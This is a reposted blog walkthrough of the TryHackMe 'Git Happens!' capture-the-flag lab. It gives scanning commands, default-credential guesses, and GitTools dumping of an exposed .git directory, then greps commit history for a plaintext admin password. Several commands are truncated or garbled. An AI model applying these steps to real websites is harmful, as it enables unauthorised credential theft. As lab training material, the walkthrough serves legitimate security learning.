Git Happens! Try Hack Me “Capture the Flag” Walkthrough  : Benjamin Reitz

Git Happens! Try Hack Me “Capture the Flag” Walkthrough 
by: Benjamin Reitz
blow post content copied from  Finxter
click here to view original post

Rate this post

In this CTF (Capture the Flag) walkthrough, we will be working through the TryHackMe challenge, Git Happens!

If you don’t want any spoilers, I’d recommend trying out this free hacking challenge first before reading any further.

We’ll be hacking into a git repository and extracting the username:password combination for the administrative portal.

We’ll make use of gittools to extract the early git commits and comments. The final step is to use some clever command line text parsing to quickly narrow things down to our password and username.

First let’s export our IPs:

export myIP=
export targetIP=

Now we’ll go ahead and connect to the TryHackMe VPN from our Kali VM (Virtual Machine). In the walkthrough video, I am running Manjaro Linux with a virtual Kali machine running on Gnome Boxes. 

sudo openvpn kalisurfer.ovpn

Now that we are properly connected to our target machine let’s start the first phase of our hack.


Our standard Nmap scan has a few extra flags today to extend the functionality.

sudo nmap $targetIP -Pn -p- -sC -A -O -oN nmap-scan-results.txt
  • -Pn = stealth scan, skip host discovery
  • -p- = scan all ports
  • -sC = run standard scripts
  • -A = Enable OS detection, version detection, script scanning, and traceroute
  • -O = Detect operating system
  • -oN = output in normal format [filename]


  GNU nano 7.0                 nmap-scan.txt                     
# Nmap 7.93 scan initiated Tue Dec 13 10:51:00 2022 as: nmap -Pn
-sC -p- -O -oN nmap-scan.txt 10.112.132
Nmap scan report for 10.112.132 (
Host is up (0.0012s latency).
All 65535 scanned ports on 10.112.132 ( are in ignor
ed states.
Not shown: 64535 filtered tcp ports (net-unreach), 1000 filtered
tcp ports (no-response)
Too many fingerprints match this host to give specific OS details

OS detection performed. Please report any incorrect results at ht
tps:// .
# Nmap done at Tue Dec 13 10:54:32 2022 – 1 IP address (1 host u
p) scanned in 212.47 seconds


We discover a login page by loading up our browser to our $targetIP. We try a few guesses of standard administrator user:password combinations without any luck.

  • admin:admin,
  • admin:password,
  • admin:password123


Next, we will sniff out directories with GoBuster. With the following command, we discover a hidden page at $targetIP/.git/

gobuster dir -w ~/hacking-tools/SecLists/Discovery/Web-Content/dirsearch.txt – url

The hidden page looks like an index of the Git repo. We can download the files individually, but with Gittools we can extract even more metadata from the Git repo.


First, we’ll download Gittools from the official Github repo.

After navigating into the new directory from Gitttools, we run the file with our target address and download location.

Use the dumper:

./ ~/THM/Git-Happens

Now we can view more details about the Git commits with the command ‘git log’.


This next series of commands will help us to quickly narrow things down to our username:password combination.

git log | grep commit  

This command displays the list of commits and hashes

git log | grep commit | cut -d " " -f2

Now we cut out just the list of hashes. The cut -d " " -f2 part of the command cuts the list into a dictionary with an open space as the delimiter.

The -f2 displays only field 2. If this was an Excel spreadsheet, it is as if we are only viewing column 2.

Next, we’ll send that output as a new input to the command <hash> git show with xargs.

-git log | grep commit | cut -d " " -f2 | xargs git show

Let’s extend the command a bit further to save it to a .txt file.

git log | grep commit | cut -d " " -f2 | xargs git show > gitcommits.txt

We can look through this .txt file manually, but it is faster to use “grep password” to find text lines with the word “password”. 

cat gitcommits.txt | grep password

And to find the username:

Now we can find the password in plaintext with a simple glance over the output.

found it! 


Thanks for watching! Catch you next time.

Feel free to check out our other TryHackMe walkthrough:

👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick “Capture The Flag” Challenge


The two tracks used as background music are used under creative commons licenses and were downloaded at

  • Mr. Frisby’s Beat Pocket – Cool Fountains
  • Damiano Baldoni – Gothic trip with thunderhorse

December 15, 2022 at 04:23PM
Click here for more details...

The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.